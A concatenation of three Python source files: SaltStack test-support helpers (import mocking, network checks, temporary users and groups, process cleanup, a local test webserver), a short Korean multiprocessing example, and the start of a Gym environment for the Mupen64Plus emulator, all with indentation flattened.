def acquire(self):
if self.activated:
return self.handler.acquire()
def release(self):
if self.activated:
return self.handler.release()
def relative_import(import_name, relative_from='../'):
'''
Update sys.path to include `relative_from` before importing `import_name`
'''
try:
return __import__(import_name)
except ImportError:
previous_frame = inspect.getframeinfo(inspect.currentframe().f_back)
sys.path.insert(
0, os.path.realpath(
os.path.join(
os.path.abspath(
os.path.dirname(previous_frame.filename)
),
relative_from
)
)
)
return __import__(import_name)
class ForceImportErrorOn(object):
'''
This class is meant to be used in mock'ed test cases which require an
``ImportError`` to be raised.
>>> import os.path
>>> with ForceImportErrorOn('os.path'):
... import os.path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 263, in __import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
>>> with ForceImportErrorOn(('os', 'path')):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
<module 'os' from '/usr/lib/python2.7/os.pyc'>
Traceback (most recent call last):
File "<stdin>", line 4, in <module>
File "salttesting/helpers.py", line 288, in __fake_import__
name, ', '.join(fromlist)
ImportError: Forced ImportError raised for 'from os import path'
>>>
>>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 281, in __fake_import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
'''
def __init__(self, *module_names):
self.__module_names = {}
for entry in module_names:
if isinstance(entry, (list, tuple)):
modname = entry[0]
self.__module_names[modname] = set(entry[1:])
else:
self.__module_names[entry] = None
self.__original_import = builtins.__import__
self.patcher = patch.object(builtins, '__import__', self.__fake_import__)
def patch_import_function(self):
self.patcher.start()
def restore_import_funtion(self):
self.patcher.stop()
def __fake_import__(self,
name,
globals_={} if six.PY2 else None,
locals_={} if six.PY2 else None,
fromlist=[] if six.PY2 else (),
level=-1 if six.PY2 else 0):
if name in self.__module_names:
importerror_fromlist = self.__module_names.get(name)
if importerror_fromlist is None:
raise ImportError(
'Forced ImportError raised for {0!r}'.format(name)
)
if importerror_fromlist.intersection(set(fromlist)):
raise ImportError(
'Forced ImportError raised for {0!r}'.format(
'from {0} import {1}'.format(
name, ', '.join(fromlist)
)
)
)
return self.__original_import(name, globals_, locals_, fromlist, level)
def __enter__(self):
self.patch_import_function()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.restore_import_funtion()
class MockWraps(object):
'''
Helper class to be used with the mock library.
To be used in the ``wraps`` keyword of ``Mock`` or ``MagicMock`` where you
want to trigger a side effect for X times, and afterwards, call the
original and un-mocked method.
As an example:
>>> def original():
... print 'original'
...
>>> def side_effect():
... print 'side effect'
...
>>> mw = MockWraps(original, 2, side_effect)
>>> mw()
side effect
>>> mw()
side effect
>>> mw()
original
>>>
'''
def __init__(self, original, expected_failures, side_effect):
self.__original = original
self.__expected_failures = expected_failures
self.__side_effect = side_effect
self.__call_counter = 0
def __call__(self, *args, **kwargs):
try:
if self.__call_counter < self.__expected_failures:
if isinstance(self.__side_effect, types.FunctionType):
return self.__side_effect()
raise self.__side_effect
return self.__original(*args, **kwargs)
finally:
self.__call_counter += 1
def requires_network(only_local_network=False):
'''
Simple decorator which is supposed to skip a test case in case there's no
network connection to the internet.
'''
def decorator(func):
@functools.wraps(func)
def wrapper(cls):
has_local_network = False
# First lets try if we have a local network. Inspired in
# verify_socket
try:
pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(('', 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(('', 18001))
retsock.close()
has_local_network = True
except socket.error:
# I wonder if we just have IPV6 support?
try:
pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
pubsock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
)
pubsock.bind(('', 18000))
pubsock.close()
retsock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
)
retsock.bind(('', 18001))
retsock.close()
has_local_network = True
except socket.error:
# Let's continue
pass
if only_local_network is True:
if has_local_network is False:
# Since we're only supposed to check local network, and no
# local network was detected, skip the test
cls.skipTest('No local network was detected')
return func(cls)
# We are using the google.com DNS records as numerical IPs to avoid
# DNS lookups which could greatly slow down this check
for addr in ('173.194.41.198', '173.194.41.199', '173.194.41.200',
'173.194.41.201', '173.194.41.206', '173.194.41.192',
'173.194.41.193', '173.194.41.194', '173.194.41.195',
'173.194.41.196', '173.194.41.197'):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.25)
sock.connect((addr, 80))
# We connected? Stop the loop
break
except socket.error:
# Let's check the next IP
continue
else:
cls.skipTest('No internet network connection was detected')
finally:
sock.close()
return func(cls)
return wrapper
return decorator
def with_system_user(username, on_existing='delete', delete=True, password=None, groups=None):
'''
Create and optionally destroy a system user to be used within a test
case. The system user is created using the ``user`` salt module.
The decorated testcase function must accept 'username' as an argument.
:param username: The desired username for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
'''
if on_existing not in ('nothing', 'delete', 'skip'):
raise RuntimeError(
'The value of \'on_existing\' can only be one of, '
'\'nothing\', \'delete\' and \'skip\''
)
if not isinstance(delete, bool):
raise RuntimeError(
'The value of \'delete\' can only be \'True\' or \'False\''
)
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug('Creating system user {0!r}'.format(username))
kwargs = {'timeout': 60, 'groups': groups}
if salt.utils.platform.is_windows():
kwargs.update({'password': password})
create_user = cls.run_function('user.add', [username], **kwargs)
if not create_user:
log.debug('Failed to create system user')
# The user was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system user {0!r}'.format(
username
)
)
if on_existing == 'delete':
log.debug(
'Deleting the system user {0!r}'.format(
username
)
)
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
if not delete_user:
cls.skipTest(
'A user named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(username)
)
log.debug(
'Second time creating system user {0!r}'.format(
username
)
)
create_user = cls.run_function('user.add', [username], **kwargs)
if not create_user:
cls.skipTest(
'A user named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(username)
)
failure = None
try:
try:
return func(cls, username)
except Exception as exc: # pylint: disable=W0703
log.error(
'Running {0!r} raised an exception: {1}'.format(
func, exc
),
exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
'user.delete', [username, True, True], timeout=60
)
if not delete_user:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system user {0!r} '
'afterwards did.'.format(username)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system user {0!r}'.format(username)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_group(group, on_existing='delete', delete=True):
'''
Create and optionally destroy a system group to be used within a test
case. The system user is crated using the ``group`` salt module.
The decorated testcase function must accept 'group' as an argument.
:param group: The desired group name for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the group was created
* delete: delete and re-create the existing user
* skip: skip the test case
'''
if on_existing not in ('nothing', 'delete', 'skip'):
raise RuntimeError(
'The value of \'on_existing\' can only be one of, '
'\'nothing\', \'delete\' and \'skip\''
)
if not isinstance(delete, bool):
raise RuntimeError(
'The value of \'delete\' can only be \'True\' or \'False\''
)
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug('Creating system group {0!r}'.format(group))
create_group = cls.run_function('group.add', [group])
if not create_group:
log.debug('Failed to create system group')
# The group was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system group {0!r}'.format(group)
)
if on_existing == 'delete':
log.debug(
'Deleting the system group {0!r}'.format(group)
)
delete_group = cls.run_function('group.delete', [group])
if not delete_group:
cls.skipTest(
'A group named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(group)
)
log.debug(
'Second time creating system group {0!r}'.format(
group
)
)
create_group = cls.run_function('group.add', [group])
if not create_group:
cls.skipTest(
'A group named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(group)
)
failure = None
try:
try:
return func(cls, group)
except Exception as exc: # pylint: disable=W0703
log.error(
'Running {0!r} raised an exception: {1}'.format(
func, exc
),
exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_group = cls.run_function('group.delete', [group])
if not delete_group:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system group {0!r} '
'afterwards did.'.format(group)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system group {0!r}'.format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_user_and_group(username, group,
on_existing='delete', delete=True):
'''
Create and optionally destroy a system user and group to be used within a
test case. The system user is crated using the ``user`` salt module, and
the system group is created with the ``group`` salt module.
The decorated testcase function must accept both the 'username' and 'group'
arguments.
:param username: The desired username for the system user.
:param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
'''
if on_existing not in ('nothing', 'delete', 'skip'):
raise RuntimeError(
'The value of \'on_existing\' can only be one of, '
'\'nothing\', \'delete\' and \'skip\''
)
if not isinstance(delete, bool):
raise RuntimeError(
'The value of \'delete\' can only be \'True\' or \'False\''
)
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug('Creating system user {0!r}'.format(username))
create_user = cls.run_function('user.add', [username])
log.debug('Creating system group {0!r}'.format(group))
create_group = cls.run_function('group.add', [group])
if not create_user:
log.debug('Failed to create system user')
# The user was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system user {0!r}'.format(
username
)
)
if on_existing == 'delete':
log.debug(
'Deleting the system user {0!r}'.format(
username
)
)
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
if not delete_user:
cls.skipTest(
'A user named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(username)
)
log.debug(
'Second time creating system user {0!r}'.format(
username
)
)
create_user = cls.run_function('user.add', [username])
if not create_user:
cls.skipTest(
'A user named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(username)
)
if not create_group:
log.debug('Failed to create system group')
# The group was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system group {0!r}'.format(group)
)
if on_existing == 'delete':
log.debug(
'Deleting the system group {0!r}'.format(group)
)
delete_group = cls.run_function('group.delete', [group])
if not delete_group:
cls.skipTest(
'A group named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(group)
)
log.debug(
'Second time creating system group {0!r}'.format(
group
)
)
create_group = cls.run_function('group.add', [group])
if not create_group:
cls.skipTest(
'A group named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(group)
)
failure = None
try:
try:
return func(cls, username, group)
except Exception as exc: # pylint: disable=W0703
log.error(
'Running {0!r} raised an exception: {1}'.format(
func, exc
),
exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
delete_group = cls.run_function('group.delete', [group])
if not delete_user:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system user {0!r} '
'afterwards did.'.format(username)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system user {0!r}'.format(username)
)
if not delete_group:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system group {0!r} '
'afterwards did.'.format(group)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system group {0!r}'.format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
class WithTempfile(object):
def __init__(self, **kwargs):
self.create = kwargs.pop('create', True)
if 'dir' not in kwargs:
kwargs['dir'] = TMP
if 'prefix' not in kwargs:
kwargs['prefix'] = '__salt.test.'
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs) # pylint: disable=W0108
)
def wrap(self, testcase, *args, **kwargs):
name = salt.utils.files.mkstemp(**self.kwargs)
if not self.create:
os.remove(name)
try:
return self.func(testcase, name, *args, **kwargs)
finally:
try:
os.remove(name)
except OSError:
pass
with_tempfile = WithTempfile
class WithTempdir(object):
def __init__(self, **kwargs):
self.create = kwargs.pop('create', True)
if 'dir' not in kwargs:
kwargs['dir'] = TMP
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs) # pylint: disable=W0108
)
def wrap(self, testcase, *args, **kwargs):
tempdir = tempfile.mkdtemp(**self.kwargs)
if not self.create:
os.rmdir(tempdir)
try:
return self.func(testcase, tempdir, *args, **kwargs)
finally:
shutil.rmtree(tempdir, ignore_errors=True)
with_tempdir = WithTempdir
def requires_system_grains(func):
'''
Function decorator which loads and passes the system's grains to the test
case.
'''
@functools.wraps(func)
def decorator(cls):
if not hasattr(cls, 'run_function'):
raise RuntimeError(
'{0} does not have the \'run_function\' method which is '
'necessary to collect the system grains'.format(
cls.__class__.__name__
)
)
return func(cls, grains=cls.run_function('grains.items'))
return decorator
def requires_salt_modules(*names):
'''
Makes sure the passed salt module is available. Skips the test if not
.. versionadded:: 0.5.2
'''
def decorator(caller):
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if old_setup is not None:
old_setup(self, *args, **kwargs)
if not hasattr(self, 'run_function'):
raise RuntimeError(
'{0} does not have the \'run_function\' method which '
'is necessary to collect the loaded modules'.format(
self.__class__.__name__
)
)
not_found_modules = self.run_function('runtests_helpers.modules_available', names)
if not_found_modules:
if len(not_found_modules) == 1:
self.skipTest('Salt module {0!r} is not available'.format(not_found_modules[0]))
self.skipTest('Salt modules not available: {0!r}'.format(not_found_modules))
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrapper(cls):
if not hasattr(cls, 'run_function'):
raise RuntimeError(
'{0} does not have the \'run_function\' method which is '
'necessary to collect the loaded modules'.format(
cls.__class__.__name__
)
)
for name in names:
if name not in cls.run_function('sys.doc', [name]):
cls.skipTest(
'Salt module {0!r} is not available'.format(name)
)
break
return caller(cls)
return wrapper
return decorator
def skip_if_binaries_missing(*binaries, **kwargs):
import salt.utils.path
if len(binaries) == 1:
if isinstance(binaries[0], (list, tuple, set, frozenset)):
binaries = binaries[0]
check_all = kwargs.pop('check_all', False)
message = kwargs.pop('message', None)
if kwargs:
raise RuntimeError(
'The only supported keyword argument is \'check_all\' and '
'\'message\'. Invalid keyword arguments: {0}'.format(
', '.join(kwargs.keys())
)
)
if check_all:
for binary in binaries:
if salt.utils.path.which(binary) is None:
return skip(
'{0}The {1!r} binary was not found'.format(
message and '{0}. '.format(message) or '',
binary
)
)
elif salt.utils.path.which_bin(binaries) is None:
return skip(
'{0}None of the following binaries was found: {1}'.format(
message and '{0}. '.format(message) or '',
', '.join(binaries)
)
)
return _id
def skip_if_not_root(func):
if not sys.platform.startswith('win'):
if os.getuid() != 0:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = 'You must be logged in as root to run this test'
else:
current_user = salt.utils.win_functions.get_current_user()
if current_user != 'SYSTEM':
if not salt.utils.win_functions.is_admin(current_user):
func.__unittest_skip__ = True
func.__unittest_skip_why__ = 'You must be logged in as an Administrator to run this test'
return func
if sys.platform.startswith('win'):
SIGTERM = signal.CTRL_BREAK_EVENT # pylint: disable=no-member
else:
SIGTERM = signal.SIGTERM
def collect_child_processes(pid):
'''
Try to collect any started child processes of the provided pid
'''
# Let's get the child processes of the started subprocess
try:
parent = psutil.Process(pid)
if hasattr(parent, 'children'):
children = parent.children(recursive=True)
else:
children = []
except psutil.NoSuchProcess:
children = []
return children[::-1] # return a reversed list of the children
def _terminate_process_list(process_list, kill=False, slow_stop=False):
for process in process_list[:][::-1]: # Iterate over a reversed copy of the list
if not psutil.pid_exists(process.pid):
process_list.remove(process)
continue
try:
if not kill and process.status() == psutil.STATUS_ZOMBIE:
# Zombie processes will exit once child processes also exit
continue
try:
cmdline = process.cmdline()
except psutil.AccessDenied:
# OSX is more restrictive about the above information
cmdline = None
if not cmdline:
try:
cmdline = process.as_dict()
except Exception:
cmdline = 'UNKNOWN PROCESS'
if kill:
log.info('Killing process(%s): %s', process.pid, cmdline)
process.kill()
else:
log.info('Terminating process(%s): %s', process.pid, cmdline)
try:
if slow_stop:
# Allow coverage data to be written down to disk
process.send_signal(SIGTERM)
try:
process.wait(2)
except psutil.TimeoutExpired:
if psutil.pid_exists(process.pid):
continue
else:
process.terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
if not psutil.pid_exists(process.pid):
process_list.remove(process)
except psutil.NoSuchProcess:
process_list.remove(process)
def terminate_process_list(process_list, kill=False, slow_stop=False):
def on_process_terminated(proc):
log.info('Process %s terminated with exit code: %s', getattr(proc, '_cmdline', proc), proc.returncode)
# Try to terminate processes with the provided kill and slow_stop parameters
log.info('Terminating process list. 1st step. kill: %s, slow stop: %s', kill, slow_stop)
# Cache the cmdline since that will be inaccessible once the process is terminated
for proc in process_list:
try:
cmdline = proc.cmdline()
except (psutil.NoSuchProcess, psutil.AccessDenied):
# OSX is more restrictive about the above information
cmdline = None
if not cmdline:
try:
cmdline = proc
except (psutil.NoSuchProcess, psutil.AccessDenied):
cmdline = '<could not be retrived; dead process: {0}>'.format(proc)
proc._cmdline = cmdline
_terminate_process_list(process_list, kill=kill, slow_stop=slow_stop)
psutil.wait_procs(process_list, timeout=15, callback=on_process_terminated)
if process_list:
# If there's still processes to be terminated, retry and kill them if slow_stop is False
log.info('Terminating process list. 2nd step. kill: %s, slow stop: %s', slow_stop is False, slow_stop)
_terminate_process_list(process_list, kill=slow_stop is False, slow_stop=slow_stop)
psutil.wait_procs(process_list, timeout=10, callback=on_process_terminated)
if process_list:
# If there's still processes to be terminated, just kill them, no slow stopping now
log.info('Terminating process list. 3rd step. kill: True, slow stop: False')
_terminate_process_list(process_list, kill=True, slow_stop=False)
psutil.wait_procs(process_list, timeout=5, callback=on_process_terminated)
if process_list:
# In there's still processes to be terminated, log a warning about it
log.warning('Some processes failed to properly terminate: %s', process_list)
def terminate_process(pid=None, process=None, children=None, kill_children=False, slow_stop=False):
'''
Try to terminate/kill the started processe
'''
children = children or []
process_list = []
def on_process_terminated(proc):
if proc.returncode:
log.info('Process %s terminated with exit code: %s', getattr(proc, '_cmdline', proc), proc.returncode)
else:
log.info('Process %s terminated', getattr(proc, '_cmdline', proc))
if pid and not process:
try:
process = psutil.Process(pid)
process_list.append(process)
except psutil.NoSuchProcess:
# Process is already gone
process = None
if kill_children:
if process:
if not children:
children = collect_child_processes(process.pid)
else:
# Let's collect children again since there might be new ones
children.extend(collect_child_processes(pid))
if children:
process_list.extend(children)
if process_list:
if process:
log.info('Stopping process %s and respective children: %s', process, children)
else:
log.info('Terminating process list: %s', process_list)
terminate_process_list(process_list, kill=slow_stop is False, slow_stop=slow_stop)
if process and psutil.pid_exists(process.pid):
log.warning('Process left behind which we were unable to kill: %s', process)
def terminate_process_pid(pid, only_children=False):
children = []
process = None
# Let's begin the shutdown routines
try:
process = psutil.Process(pid)
children = collect_child_processes(pid)
except psutil.NoSuchProcess:
log.info('No process with the PID %s was found running', pid)
if only_children:
return terminate_process(children=children, kill_children=True, slow_stop=True)
return terminate_process(pid=pid, process=process, children=children, kill_children=True, slow_stop=True)
def repeat(caller=None, condition=True, times=5):
'''
Repeat a test X amount of times until the first failure.
.. code-block:: python
class MyTestCase(TestCase):
@repeat
def test_sometimes_works(self):
pass
'''
if caller is None:
return functools.partial(repeat, condition=condition, times=times)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith('test_')]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(caller, attrname, repeat(caller=function, condition=condition, times=times))
except Exception as exc:
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
result = None
for attempt in range(1, times+1):
log.info('%s test run %d of %s times', cls, attempt, times)
caller(cls)
return cls
return wrap
def http_basic_auth(login_cb=lambda username, password: False):
'''
A crude decorator to force a handler to request HTTP Basic Authentication
Example usage:
.. code-block:: python
@http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
class AuthenticatedHandler(tornado.web.RequestHandler):
pass
'''
def wrapper(handler_class):
def wrap_execute(handler_execute):
def check_auth(handler, kwargs):
auth = handler.request.headers.get('Authorization')
if auth is None or not auth.startswith('Basic '):
# No username/password entered yet, we need to return a 401
# and set the WWW-Authenticate header to request login.
handler.set_status(401)
handler.set_header(
'WWW-Authenticate', 'Basic realm=Restricted')
else:
# Strip the 'Basic ' from the beginning of the auth header
# leaving the base64-encoded secret
username, password = \
base64.b64decode(auth[6:]).split(':', 1)
if login_cb(username, password):
# Authentication successful
return
else:
# Authentication failed
handler.set_status(403)
handler._transforms = []
handler.finish()
def _execute(self, transforms, *args, **kwargs):
check_auth(self, kwargs)
return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
return wrapper
def generate_random_name(prefix, size=6):
'''
Generates a random name by combining the provided prefix with a randomly generated
ascii string.
.. versionadded:: 2018.3.0
prefix
The string to prefix onto the randomly generated ascii string.
size
The number of characters to generate. Default: 6.
'''
return prefix + ''.join(
random.choice(string.ascii_uppercase + string.digits)
for x in range(size)
)
class Webserver(object):
'''
Starts a tornado webserver on 127.0.0.1 on a random available port
USAGE:
.. code-block:: python
from tests.support.helpers import Webserver
webserver = Webserver('/path/to/web/root')
webserver.start()
webserver.stop()
'''
def __init__(self,
root=None,
port=None,
wait=5,
handler=None):
'''
root
Root directory of webserver. If not passed, it will default to the
location of the base environment of the integration suite's file
roots (tests/integration/files/file/base/)
port
Port on which to listen. If not passed, a random one will be chosen
at the time the start() function is invoked.
wait : 5
Number of seconds to wait for the socket to be open before raising
an exception
handler
Can be used to use a subclass of tornado.web.StaticFileHandler,
such as when enforcing authentication with the http_basic_auth
decorator.
'''
if port is not None and not isinstance(port, six.integer_types):
raise ValueError('port must be an integer')
if root is None:
root = os.path.join(FILES, 'file', 'base')
try:
self.root = os.path.realpath(root)
except AttributeError:
raise ValueError('root must be a string')
self.port = port
self.wait = wait
self.handler = handler \
if handler is not None \
else tornado.web.StaticFileHandler
self.web_root = None
def target(self):
'''
Threading target which stands up the tornado application
'''
self.ioloop = tornado.ioloop.IOLoop()
self.ioloop.make_current()
self.application = tornado.web.Application(
[(r'/(.*)', self.handler, {'path': self.root})])
self.application.listen(self.port)
self.ioloop.start()
@property
def listening(self):
if self.port is None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return sock.connect_ex(('127.0.0.1', self.port)) == 0
def url(self, path):
'''
Convenience function which, given a file path, will return a URL that
points to that path. If the path is relative, it will just be appended
to self.web_root.
'''
if self.web_root is None:
raise RuntimeError('Webserver instance has not been started')
err_msg = 'invalid path, must be either a relative path or a path ' \
'within {0}'.format(self.root)
try:
relpath = path \
if not os.path.isabs(path) \
else os.path.relpath(path, self.root)
if relpath.startswith('..' + os.sep):
raise ValueError(err_msg)
return '/'.join((self.web_root, relpath))
except AttributeError:
raise ValueError(err_msg)
def start(self):
'''
Starts the webserver
'''
if self.port is None:
self.port = get_unused_localhost_port()
self.web_root = 'http://127.0.0.1:{0}'.format(self.port)
self.server_thread = threading.Thread(target=self.target)
self.server_thread.daemon = True
self.server_thread.start()
for idx in range(self.wait + 1):
if self.listening:
break
if idx != self.wait:
time.sleep(1)
else:
raise Exception(
'Failed to start tornado webserver on 127.0.0.1:{0} within '
'{1} seconds'.format(self.port, self.wait)
)
def stop(self):
'''
Stops the webserver
'''
self.ioloop.add_callback(self.ioloop.stop)
self.server_thread.join()
def win32_kill_process_tree(pid, sig=signal.SIGTERM, include_parent=True,
timeout=None, on_terminate=None):
'''
Kill a process tree (including grandchildren) with signal "sig" and return
a (gone, still_alive) tuple. "on_terminate", if specified, is a callabck
function which is called as soon as a child terminates.
'''
if pid == os.getpid():
raise RuntimeError("I refuse to kill myself")
try:
parent = psutil.Process(pid)
except psutil.NoSuchProcess:
log.debug("PID not found alive: %d", pid)
return ([], [])
children = parent.children(recursive=True)
if include_parent:
children.append(parent)
for p in children:
p.send_signal(sig)
gone, alive = psutil.wait_procs(children, timeout=timeout,
callback=on_terminate)
return (gone, alive)
def this_user():
'''
Get the user associated with the current process.
'''
if salt.utils.platform.is_windows():
return salt.utils.win_functions.get_current_user(with_domain=False)
return pwd.getpwuid(os.getuid())[0]
def dedent(text, linesep=os.linesep):
'''
A wrapper around textwrap.dedent that also sets line endings.
'''
linesep = salt.utils.stringutils.to_unicode(linesep)
unicode_text = textwrap.dedent(salt.utils.stringutils.to_unicode(text))
clean_text = linesep.join(unicode_text.splitlines())
if unicode_text.endswith(u'\n'):
clean_text += linesep
if not isinstance(text, six.text_type):
return salt.utils.stringutils.to_bytes(clean_text)
return clean_text
|
Ex11_multiprocessing.py | """
기존의 파이썬은 여러 모듈에서 프로세스를 다루는 함수와 메소드를 따로 제공하여 중복성이 심했다고 한다.
파이썬은 multiprocessing 모듈이 thread 모듈보다 나중에 설계되었다고 한다.
파이썬은 병렬처리를 위해 쓰레드를 사용하지 않고 multiprocessing 모듈을 사용한다.
multiprocessing 모듈은 스레딩 모듈과 유사한 API를 사용한다.
또한 스레드 대신 하위 프로세스를 사용하여 전역 인터프리터 잠금을 효과적으로 처리한다.
유닉스 계열과 윈도우 모두 실행된다.
"""
import os
import multiprocessing
def func(tname):
print('프로세스 %s : ' % (os.getpid()), tname)
if __name__ == '__main__':
func('나는 메인')
for n in range(4):
p = multiprocessing.Process(target=func, args=('나는 별도의 프로세스',))
p.start()
# p.join() # 추후에 확인
print('메인종료')
|
mupen64plus_env.py | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import abc
import array
import inspect
import itertools
import json
import os
import subprocess
import threading
import time
from termcolor import cprint
import yaml
import gym
from gym import error, spaces, utils
from gym.utils import seeding
import numpy as np
import mss
###############################################
class ImageHelper:
def GetPixelColor(self, image_array, x, y):
base_pixel = image_array[y][x]
red = base_pixel[0]
green = base_pixel[1]
blue = base_pixel[2]
return (red, green, blue)
###############################################
### Variables & Constants ###
###############################################
config = yaml.safe_load(open(os.path.join(os.path.dirname(inspect.stack()[0][1]), "config.yml")))
MILLISECOND = 1.0 / 1000.0
IMAGE_HELPER = ImageHelper()
###############################################
class Mupen64PlusEnv(gym.Env):
__metaclass__ = abc.ABCMeta
metadata = {'render.modes': ['human']}
def __init__(self, rom_name):
self.viewer = None
self.reset_count = 0
self.step_count = 0
self.running = True
self.mss_grabber = None
self.episode_over = False
self.numpy_array = None
self.controller_server, self.controller_server_thread = self._start_controller_server()
self.xvfb_process, self.emulator_process = self._start_emulator(rom_name=rom_name)
self._navigate_menu()
self.observation_space = \
spaces.Box(low=0, high=255, shape=(config['SCR_H'], config['SCR_W'], config['SCR_D']))
self.action_space = spaces.MultiDiscrete([[-80, 80], # Joystick X-axis
[-80, 80], # Joystick Y-axis
[0, 1], # A Button
[0, 1], # B Button
[0, 1]]) # RB Button
def _step(self, action):
#cprint('Step %i: %s' % (self.step_count, action), 'green')
self._act(action)
obs = self._observe()
self.episode_over = self._evaluate_end_state()
reward = self._get_reward()
self.step_count += 1
return obs, reward, self.episode_over, {}
def _act(self, action, count=1):
for _ in itertools.repeat(None, count):
self.controller_server.send_controls(action)
def _wait(self, count=1, wait_for='Unknown'):
self._act(ControllerState.NO_OP, count=count)
def _press_button(self, button):
self._act(button) # Press
self._act(ControllerState.NO_OP) # and release
def _observe(self):
#cprint('Observe called!', 'yellow')
if config['USE_XVFB']:
offset_x = 0
offset_y = 0
else:
offset_x = config['OFFSET_X']
offset_y = config['OFFSET_Y']
image_array = \
np.array(self.mss_grabber.grab({"top": offset_y,
"left": offset_x,
"width": config['SCR_W'],
"height": config['SCR_H']}),
dtype=np.uint8)
# drop the alpha channel and flip red and blue channels (BGRA -> RGB)
self.numpy_array = \
np.flip(image_array[:, :, :3], 2)
return self.numpy_array
@abc.abstractmethod
def _navigate_menu(self):
return
@abc.abstractmethod
def _get_reward(self):
#cprint('Get Reward called!', 'yellow')
return 0
@abc.abstractmethod
def _evaluate_end_state(self):
#cprint('Evaluate End State called!', 'yellow')
return False
@abc.abstractmethod
def _reset(self):
cprint('Reset called!', 'yellow')
self.reset_count += 1
self.step_count = 0
return self._observe()
def _render(self, mode='human', close=False):
if close:
if self.viewer is not None:
self.viewer.close()
self.viewer = None
return
img = self.numpy_array
if mode == 'rgb_array':
return img
elif mode == 'human':
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(img)
def _close(self):
cprint('Close called!', 'yellow')
self.running = False
self._kill_emulator()
